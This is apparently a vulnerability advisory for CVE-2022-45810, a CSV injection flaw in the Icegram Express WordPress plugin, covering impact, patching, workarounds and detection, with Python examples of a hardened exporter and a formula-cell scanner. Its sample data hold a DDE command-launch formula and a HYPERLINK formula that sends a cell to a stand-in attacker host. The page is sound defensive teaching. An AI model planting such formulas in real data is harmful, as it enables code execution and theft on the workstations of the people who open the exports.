CVE-2022-45810

9.8 CRITICAL

📋 TL;DR

This CVE describes a CSV injection vulnerability (CWE-1236, improper neutralization of formula elements in a CSV file) in the Icegram Express WordPress plugin (WordPress.org slug email-subscribers), all versions up to and including 5.5.2. Attacker-controlled values stored by the plugin are written into its CSV export without neutralizing cells that begin with formula characters (=, +, -, @). When an administrator opens that export in a spreadsheet application such as Excel or LibreOffice Calc, the formulas are evaluated in the administrator's context: on Excel with DDE this can launch a command on the administrator's workstation, and functions such as HYPERLINK can exfiltrate other cells. The WordPress server itself is not compromised; the victim is the person who opens the file.
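The pattern behind the vulnerability and its fix, as an added example written for this page. It is not the plugin's code (Icegram Express is PHP) and the subscriber rows are constructed; the only real-world element is the classic Excel DDE payload in the second data row, shown because it is the canonical demonstration of the bug class. The export_hardened function applies the OWASP recommendation: quote every cell, let the csv module double embedded quotes, and prefix a single quote to any cell whose first character is a formula trigger.

```python
import csv
import io

# Leading characters that make Excel, LibreOffice Calc and Google Sheets treat a
# cell as a formula (the OWASP CSV-injection list). Tab and carriage return are
# included because a cell such as "\t=1+1" still evaluates but slips past a check
# that only looks at the first printable character.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def export_vulnerable(rows):
    """Emit rows exactly as stored, which is the CSV-injection defect: a cell that
    starts with a trigger character is written verbatim and evaluated by the
    spreadsheet client of whoever opens the download."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(rows)
    return buf.getvalue()


def neutralize_cell(value):
    """Make one cell inert: prefix a single quote when the first character is a
    formula trigger, so the client stores the content as text. Values are
    stringified first so None and numbers never raise."""
    text = "" if value is None else str(value)
    if text and text[0] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_hardened(rows):
    """Same export with every cell neutralized and quoted. QUOTE_ALL makes the
    csv module wrap each cell in double quotes and double any embedded quote,
    the second half of the OWASP recommendation."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample data, not real subscriber records. Row 2 carries the classic
# Excel DDE payload; row 3 starts with "-", which a filter that only checks for
# "=" would let through even though Excel still treats it as a formula.
SUBSCRIBERS = [
    ["email", "first_name", "status"],
    ["alice@example.com", "Alice", "subscribed"],
    ["mallory@example.com", "=cmd|' /C calc'!A0", "subscribed"],
    ["bob@example.com", "-Bob", "unconfirmed"],
]

if __name__ == "__main__":
    print(export_vulnerable(SUBSCRIBERS))
    print(export_hardened(SUBSCRIBERS))
```

The leading apostrophe remains visible in some clients when the file is imported as CSV, which is the known cost of this mitigation; the alternative of stripping the first character silently alters data and is usually worse.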

💻 Affected Systems

Products:
  • Icegram Express – Email Marketing, Newsletters and Automation for WordPress & WooCommerce (WordPress.org slug: email-subscribers)
Versions: all versions up to and including 5.5.2 (fixed in 5.5.3)
Operating Systems: Any OS running WordPress; the code actually attacked is the spreadsheet client on the victim's workstation
Default Config Vulnerable: ⚠️ Yes
Notes: Requires user interaction. A user with access to the export must download the CSV and open it in a spreadsheet application that evaluates formulas.

📦 What is this software?

Icegram Express, previously published as Email Subscribers & Newsletters (hence the email-subscribers slug), is a WordPress plugin for collecting subscribers through opt-in forms and sending newsletters and automated campaigns. Subscriber data collected through public forms is exactly the kind of untrusted input that later appears in an administrator's CSV export.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Code execution on an administrator's workstation when the CSV export is opened in a spreadsheet application that honours DDE or similar external-program formulas, potentially leading to compromise of a privileged user's machine. Current Excel versions show security prompts before launching an external program, so this outcome needs a user who accepts them.

🟠 Likely Case

Data theft through formulas that exfiltrate other cells (for example via HYPERLINK or external references), or malware installation and command execution on client systems when exports are opened in spreadsheet software.

🟢 If Mitigated

Limited impact if exports are produced with formula-leading cells neutralized, or if users open CSV files in a text editor or in a spreadsheet application configured not to evaluate DDE and external content.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation needs two parties: whoever plants the formula in data the plugin stores, and a privileged user who downloads the export and opens it in a spreadsheet client. The attack targets the client workstation, not the WordPress server.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 5.5.3 or later

Vendor Advisory: https://patchstack.com/database/vulnerability/email-subscribers/wordpress-icegram-express-email-subscribers-newsletters-and-marketing-automation-plugin-plugin-5-5-2-csv-injection

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the Icegram Express plugin.
4. Click 'Update Now' if an update is available.
5. If no update is offered, download version 5.5.3 or later from the WordPress plugin repository and update manually.

🔧 Temporary Workarounds

Disable CSV Export (applies to: all)

Temporarily disable the CSV export functionality in the plugin settings until the update is applied, so that no stored formula can reach a spreadsheet client.

Educate Users (applies to: all)

Train users who handle exports to open CSV files in a text editor, or in a spreadsheet application with DDE and external-content evaluation disabled, and never to accept a security prompt triggered by opening a downloaded CSV.

🧯 If You Can't Patch

  • Disable the Icegram Express plugin entirely until patched
  • Implement web application firewall rules to block the plugin's CSV export requests (this also blocks legitimate exports)
  • Review stored subscriber data for fields that begin with =, +, -, @, a tab or a carriage return, and clean them before anyone exports

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Icegram Express → Version. If the version is 5.5.2 or earlier, you are vulnerable.

Check Version:

wp plugin get email-subscribers --field=version

(The WP-CLI argument is the plugin's WordPress.org directory name, email-subscribers, not icegram-express.)

Verify Fix Applied:

Verify plugin version is 5.5.3 or later in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

  • Unusual CSV export requests (volume, time of day, or accounts that do not normally export)
  • Multiple failed CSV export attempts
  • Stored plugin data (subscriber fields) whose values begin with =, +, -, @, a tab or a carriage return

Network Indicators:

  • CSV downloads containing cells that begin with a formula trigger character (=, +, -, @) or with a tab or carriage return used to hide one
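A scanner for the network indicator above, as an added example that is not part of the original advisory: it parses a CSV document the way a spreadsheet client would and reports every cell that would be evaluated as a formula. It strips a leading UTF-8 BOM so the first cell cannot hide its first character, checks for the tab and carriage-return variants, and exempts plain signed numbers so that a negative balance is not reported. The sample export is constructed, including the HYPERLINK exfiltration formula and the already-neutralized cell in the last row.

```python
import csv
import io
import re

# Leading characters that spreadsheet clients treat as the start of a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# Plain signed numbers such as -42 or +3.5 also start with a trigger but are
# ordinary data; exempting them keeps the scan from flagging every negative value.
NUMERIC = re.compile(r"[+-]?\d+(\.\d+)?")


def find_formula_cells(csv_text):
    """Return (record_no, column_no, cell) for every cell a spreadsheet client
    would evaluate. Numbers are 1-based and record 1 is the header row. A leading
    UTF-8 BOM, common in Windows-produced exports, is stripped first."""
    findings = []
    reader = csv.reader(io.StringIO(csv_text.lstrip("\ufeff")))
    for record_no, row in enumerate(reader, start=1):
        for column_no, cell in enumerate(row, start=1):
            if not cell or cell[0] not in FORMULA_TRIGGERS:
                continue
            if NUMERIC.fullmatch(cell.strip()):
                continue
            findings.append((record_no, column_no, cell))
    return findings


# Constructed sample export, not a real download. Record 3 carries a HYPERLINK
# exfiltration formula that sends the neighbouring email to an attacker host,
# record 4 hides its "=" behind a tab, and record 5 was already neutralized with
# a leading single quote and must not be flagged.
SAMPLE_EXPORT = (
    "email,first_name,balance\n"
    "alice@example.com,Alice,-42\n"
    'mallory@example.com,"=HYPERLINK(""http://attacker.example/?""&A2,""open"")",0\n'
    'eve@example.com,"\t=2+2",0\n'
    "bob@example.com,'=safe,0\n"
)

if __name__ == "__main__":
    for record_no, column_no, cell in find_formula_cells(SAMPLE_EXPORT):
        print(f"record {record_no} column {column_no}: {cell!r}")
```

Run it over exports captured at the proxy or already sitting in users' download folders; any hit in a file produced by a 5.5.2 or earlier install is evidence that a formula reached a workstation, not just that the site was vulnerable.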

SIEM Query:

source="wordpress.log" AND "csv" AND "export" AND ("icegram" OR "email-subscribers")
